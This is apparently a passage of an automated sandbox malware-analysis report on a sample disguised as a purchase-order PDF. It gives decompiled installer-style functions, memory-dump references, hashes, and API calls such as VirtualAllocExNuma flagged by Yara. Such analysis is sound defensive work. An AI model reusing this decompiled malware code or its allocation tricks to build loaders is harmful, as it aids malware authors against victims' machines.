Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 02450838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 024507DA: GetSystemInfo.KERNEL32(?), ref: 024507F7

VirtualAllocExNuma.KERNEL32(00000000), ref: 0245089D

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocInfoNumaSystemVirtual
String ID:
API String ID: 449148690-0
Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
Instruction ID: 9dc9a02109270376a699bdc88facae04a3526a7e15a74165aa0ca3e95304e01b
Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
Instruction Fuzzy Hash: 69F01878D44329BAEB207BF25C0AB6D76799F08701F10655B6DC0761C3DA7C46008EA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000,00412588,0040CEF0,00403579,0040CEF0,00412588,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0245073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17D78400,00003000,00000004), ref: 02450777

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
Instruction ID: 7cb1cf57793e3a4fa8d11d744a7c2efed3a40adc2ddf2cf14d238e6e81d47735
Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
Instruction Fuzzy Hash: 80113674D00228AFDB10EFA8CC49BAEBBB5EB08304F209496E940B7292D3714A40CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32(?,?), ref: 004058B3
GetSystemMetrics.USER32(00000002), ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32(00000000), ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

{, xrefs: 00405A6F
H7B, xrefs: 00405AF7

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Alvin\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(Fosklcks,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,Fosklcks), ref: 00404C28
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

